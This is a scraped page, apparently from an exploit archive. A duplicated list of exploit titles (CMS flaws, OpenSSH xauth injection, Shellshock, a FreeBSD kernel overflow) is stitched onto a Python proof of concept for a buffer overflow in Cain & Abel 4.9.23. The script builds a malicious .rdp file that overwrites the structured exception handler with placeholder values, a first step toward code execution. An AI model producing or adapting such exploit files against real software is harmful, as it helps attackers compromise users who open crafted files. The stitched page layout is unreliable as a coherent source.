
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
38 lines
1.1 KiB
Python
Executable file
38 lines
1.1 KiB
Python
Executable file
# exploit.py
|
|
##########################################################
|
|
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
|
|
# (other versions may also affected)
|
|
# By:Encrypt3d.M!nd
|
|
# encrypt3d.blogspot.com
|
|
#
|
|
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
|
|
##########################################################
|
|
#
|
|
# Description:
|
|
# When Using Remote Desktop Password Decoder in Cain and
|
|
# Importing ".rdp" file contains long Chars(ex:8250 chars)
|
|
# The Program Will crash.And The Following Happen:
|
|
#
|
|
# EAX:41414141 ECX:7C832648 EDX:41414142 EBX:00000000
|
|
# ESP:0012BCD4 EBP:0012BCD4 ESI:001F07A8 EDI:00000001
|
|
# EIP:7E43C201 USER32.7E43C201
|
|
#
|
|
# Access violation When Reading [41414141]
|
|
#
|
|
# And Also The Pointer to next SEH record and SE Handler
|
|
# Will gonna BE Over-wrote
|
|
#
|
|
# This Poc Will Gonna Overwrite the Pointer to next SEH
|
|
# With"42424242" and The SE Handler with"43434343"
|
|
#
|
|
##########################################################
|
|
chars = "A"*8194
|
|
ptns = "B"*4
|
|
shan = "C"*4
|
|
chars2 = "A"*200
|
|
|
|
exp=open('cain.rdp','w')
|
|
exp.write(chars+ptns+shan+chars2)
|
|
exp.close()
|
|
|
|
# milw0rm.com [2008-11-30]
|